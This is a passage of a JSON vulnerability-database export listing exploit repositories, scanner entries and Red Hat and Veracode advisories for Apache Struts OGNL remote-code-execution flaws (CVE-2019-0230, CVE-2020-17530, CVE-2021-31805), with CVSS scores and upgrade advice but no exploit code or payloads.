"7247E67F-6DD7-5526-8312-91D0D99FED26", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-19T02:22:13", "description": "## What's this\r\nThis is a Simple test Project for S2-061 which c...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-12-13T11:02:15", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Apache Struts", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17530"], "modified": "2022-07-18T20:20:58", "id": "EF22B1BD-85C3-525C-B7D6-94014939E96B", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-23T23:04:36", "description": "# CVE-2019-0230\nCVE-2019-0230 Exploit\n\nThis is CVE-2019-0...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-22T17:55:10", "type": "githubexploit", "title": "Exploit for Improperly Controlled Modification of Dynamically-Determined Object Attributes in Apache Struts", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230"], "modified": "2021-10-25T12:46:45", "id": "BD05B538-25EA-5C42-AE8D-229D78B57CB1", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-23T23:05:07", "description": "# CVE-2019-0230\nCVE-2019-0230 Exploit\n\nThis is CVE-2019-0...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-08-13T13:05:36", "type": "githubexploit", "title": "Exploit for Improperly Controlled Modification of Dynamically-Determined Object Attributes in Apache Struts", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230"], "modified": "2021-12-29T12:51:47", "id": "5E7409E5-7716-5F40-999C-E6622B806F5E", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-23T23:10:04", "description": "# CVE-2019-0230_Struts2S2-059\n\n## How to use\n\n### Build Struts25...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-12-11T18:57:14", "type": "githubexploit", "title": "Exploit for Improperly Controlled Modification of Dynamically-Determined Object Attributes in Apache Struts", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230"], "modified": "2021-08-27T17:41:18", "id": "453574C2-C801-529D-A0A6-5C5E1471F1AC", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-01T05:29:19", "description": "## What's this\r\nThis is a Simple test Project for S2-059 which c...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-12-11T03:40:04", "type": "githubexploit", "title": "Exploit for Improperly Controlled Modification of Dynamically-Determined Object Attributes in Apache Struts", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230"], "modified": "2022-08-01T02:16:43", "id": "4E339DB6-4704-5991-B690-DF8D7307532E", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-23T23:13:19", "description": "CVE-2019-0230\nCVE-2019-0230 Exploit\n\nThis is CVE-20...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-08-13T13:31:52", "type": "githubexploit", "title": "Exploit for Improperly Controlled Modification of Dynamically-Determined Object Attributes in Apache Struts", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230"], "modified": "2021-03-14T04:43:03", "id": "B1E738E0-BF1B-50E1-88E2-1D265CF9AEB8", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:59:11", "description": "\u4e00\u3001\u8fd1\u671f\uff0c\u53d1\u73b0Apache Struts2 \u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e\uff08CVE\u7f16\u53f7\uff1aCVE-2020-17530\uff09\u3002Apache Str...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-12-09T12:34:54", "type": "githubexploit", "title": "Exploit for Incorrect Permission Assignment for Critical Resource in Apache Accumulo", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17533", "CVE-2020-17530"], "modified": "2021-09-09T13:27:49", "id": "2691C74B-4ECB-5E22-8BDF-7784E321BE55", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}], "saint": [{"lastseen": "2023-06-19T20:31:16", "description": "Added: 04/26/2022 \n\n\n### Background\n\nApache Struts is an open-source web application framework for developing Java EE web applications. It uses and extends the Java Servlet API to encourage developers to adopt a model-view-controller (MVC) architecture. \n\nStruts uses Object-Graph Navigation Language (OGNL) to provide extensive expression evaluation capabilities. \n\n### Problem\n\nA vulnerability in Apache Struts could allow remote attackers to execute arbitrary commands if the application uses forced OGNL evaluation on user input. This vulnerability exists due to an incomplete fix for CVE-2020-17530. \n\n### Resolution\n\n[Upgrade](<https://struts.apache.org/download.cgi>) to Apache Struts 2.5.30 or higher. \n\n### References\n\n<https://cwiki.apache.org/confluence/display/WW/S2-062> \n \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-26T00:00:00", "type": "saint", "title": "Apache Struts forced OGNL evaluation incomplete fix", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17530"], "modified": "2022-04-26T00:00:00", "id": "SAINT:61E99B83D8C03F67350245D1B8BDC99C", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/struts_forced_ognl2", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-06T16:29:26", "description": "Added: 04/26/2022 \n\n\n### Background\n\nApache Struts is an open-source web application framework for developing Java EE web applications. It uses and extends the Java Servlet API to encourage developers to adopt a model-view-controller (MVC) architecture. \n\nStruts uses Object-Graph Navigation Language (OGNL) to provide extensive expression evaluation capabilities. \n\n### Problem\n\nA vulnerability in Apache Struts could allow remote attackers to execute arbitrary commands if the application uses forced OGNL evaluation on user input. This vulnerability exists due to an incomplete fix for CVE-2020-17530. \n\n### Resolution\n\n[Upgrade](<https://struts.apache.org/download.cgi>) to Apache Struts 2.5.30 or higher. \n\n### References\n\n<https://cwiki.apache.org/confluence/display/WW/S2-062> \n \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-26T00:00:00", "type": "saint", "title": "Apache Struts forced OGNL evaluation incomplete fix", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17530"], "modified": "2022-04-26T00:00:00", "id": "SAINT:D1B88155F516D415CE4F67A190458DDB", "href": "https://download.saintcorporation.com/cgi-bin/exploit_info/struts_forced_ognl2", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-13T15:01:30", "description": "Added: 11/27/2020 \nCVE: [CVE-2019-0230](<https://vulners.com/cve/CVE-2019-0230>) \n\n\n### Background\n\nApache Struts is an open-source web application framework for developing Java EE web applications. It uses and extends the Java Servlet API to encourage developers to adopt a model-view-controller (MVC) architecture. \n\nStruts uses Object-Graph Navigation Language (OGNL) to provide extensive expression evaluation capabilities. \n\n### Problem\n\nApache Struts can be forced to use double OGNL evaluation, which could allow a remote attacker to execute arbitrary code by sending a specially crafted request. \n\n### Resolution\n\n[Upgrade](<http://struts.apache.org/download.cgi#struts23151>) to Struts 2.5.22 or higher. \n\n### References\n\n<https://cwiki.apache.org/confluence/display/ww/s2-059> \n\n\n### Limitations\n\ncurl must be installed on the target for this exploit to succeed. \n\n### Platforms\n\nLinux \n \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-11-27T00:00:00", "type": "saint", "title": "Apache Struts double OGNL evaluation", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230"], "modified": "2020-11-27T00:00:00", "id": "SAINT:891A42933A0DE986694E3B7D51B3F2F1", "href": "https://download.saintcorporation.com/cgi-bin/exploit_info/struts_double_ognl", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T14:33:35", "description": "Added: 11/27/2020 \nCVE: [CVE-2019-0230](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0230>) \n\n\n### Background\n\nApache Struts is an open-source web application framework for developing Java EE web applications. It uses and extends the Java Servlet API to encourage developers to adopt a model-view-controller (MVC) architecture. \n\nStruts uses Object-Graph Navigation Language (OGNL) to provide extensive expression evaluation capabilities. \n\n### Problem\n\nApache Struts can be forced to use double OGNL evaluation, which could allow a remote attacker to execute arbitrary code by sending a specially crafted request. \n\n### Resolution\n\n[Upgrade](<http://struts.apache.org/download.cgi#struts23151>) to Struts 2.5.22 or higher. \n\n### References\n\n<https://cwiki.apache.org/confluence/display/ww/s2-059> \n\n\n### Limitations\n\ncurl must be installed on the target for this exploit to succeed. \n\n### Platforms\n\nLinux \n \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-11-27T00:00:00", "type": "saint", "title": "Apache Struts double OGNL evaluation", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230"], "modified": "2020-11-27T00:00:00", "id": "SAINT:AE1DA80E6B0E4C12B5D781794166897B", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/struts_double_ognl", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-19T20:33:36", "description": "Added: 11/27/2020 \nCVE: [CVE-2019-0230](<https://vulners.com/cve/CVE-2019-0230>) \n\n\n### Background\n\nApache Struts is an open-source web application framework for developing Java EE web applications. It uses and extends the Java Servlet API to encourage developers to adopt a model-view-controller (MVC) architecture. \n\nStruts uses Object-Graph Navigation Language (OGNL) to provide extensive expression evaluation capabilities. \n\n### Problem\n\nApache Struts can be forced to use double OGNL evaluation, which could allow a remote attacker to execute arbitrary code by sending a specially crafted request. \n\n### Resolution\n\n[Upgrade](<http://struts.apache.org/download.cgi#struts23151>) to Struts 2.5.22 or higher. \n\n### References\n\n<https://cwiki.apache.org/confluence/display/ww/s2-059> \n\n\n### Limitations\n\ncurl must be installed on the target for this exploit to succeed. \n\n### Platforms\n\nLinux \n \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-11-27T00:00:00", "type": "saint", "title": "Apache Struts double OGNL evaluation", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230"], "modified": "2020-11-27T00:00:00", "id": "SAINT:1126B0AA9A8BD987E404F1746F1D8BFA", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/struts_double_ognl", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "redhatcve": [{"lastseen": "2023-06-06T15:06:34", "description": "A flaw was found in the Apache Struts frameworks. When forced, some of the tag's attributes perform a double evaluation if a developer applies forced OGNL evaluation by using the %{...} syntax. Using a forced OGNL evaluation on untrusted user input allows an attacker to perform remote code execution and security degradation. The highest threat from this vulnerability is to data confidentiality, integrity as well as system availability.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-12-08T19:34:44", "type": "redhatcve", "title": "CVE-2020-17530", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17530"], "modified": "2023-04-06T06:49:16", "id": "RH:CVE-2020-17530", "href": "https://access.redhat.com/security/cve/cve-2020-17530", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-13T14:52:37", "description": "A flaw was found in Apache Struts frameworks. When forced, struts2 performs double evaluation of attributes' values assigned to certain tags attributes such as ID so it is possible to pass a value that will be evaluated again when a tag's attributes will be rendered. With a carefully crafted request, this can lead to Remote Code Execution (RCE). The largest threat from this vulnerability is to data confidentiality and integrity as well as system availability.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-08-18T19:29:30", "type": "redhatcve", "title": "CVE-2019-0230", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230"], "modified": "2023-04-06T05:37:27", "id": "RH:CVE-2019-0230", "href": "https://access.redhat.com/security/cve/cve-2019-0230", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-06T15:02:59", "description": "The fix issued for CVE-2020-17530 was incomplete. So from Apache Struts 2.0.0 to 2.5.29, still some of the tag\u2019s attributes could perform a double evaluation if a developer applied forced OGNL evaluation by using the %{...} syntax. Using forced OGNL evaluation on untrusted user input can lead to a Remote Code Execution and security degradation.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-13T06:28:32", "type": "redhatcve", "title": "CVE-2021-31805", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17530", "CVE-2021-31805"], "modified": "2023-04-06T09:03:31", "id": "RH:CVE-2021-31805", "href": "https://access.redhat.com/security/cve/cve-2021-31805", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "veracode": [{"lastseen": "2023-04-18T06:54:22", "description": "struts2-core is vulnerable to remote code execution. Tag attributes can be used to perform a double evaluation when forced OGNL evaluation is applied, by using the `%{...}` syntax. This can lead to remote code execution when an attacker provides a malicious input to be evaluated.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-12-09T05:42:42", "type": "veracode", "title": "Remote Code Execution", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17530"], "modified": "2022-06-03T18:20:48", "id": "VERACODE:28516", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-28516/summary", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-04-18T11:29:42", "description": "struts2-core is vulnerable to remote code execution (RCE). The vulnerability exists through the possibility of a forced double OGNL expression through the `${itemValue}` expression in `simple/radiomap.ftl`.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-08-14T01:35:22", "type": "veracode", "title": "Remote Code Execution (RCE)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", 